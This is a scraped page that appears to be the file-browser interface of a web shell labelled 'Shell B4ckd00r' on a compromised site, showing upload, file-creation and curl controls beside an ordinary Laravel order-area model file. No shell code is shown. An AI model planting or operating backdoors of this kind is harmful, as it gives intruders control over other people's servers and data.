Shell B4ckd00r
Current Dir :
/
home
/
u789730693
/
domains
/
piorasplash.com
/
public_html
/
app
/
Models
/
Home
Upload
Create Dir
Create File
Curl
Current File : /home/u789730693/domains/piorasplash.com/public_html/app/Models/OrderArea.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; class OrderArea extends Model { use HasFactory; protected $table = "order_areas"; protected $fillable = ['country', 'state', 'city', 'shipping_cost', 'status']; protected $casts = [ 'id' => 'integer', 'country' => 'string', 'state' => 'string', 'city' => 'string', 'shipping_cost' => 'string', 'status' => 'integer', ]; }
v.01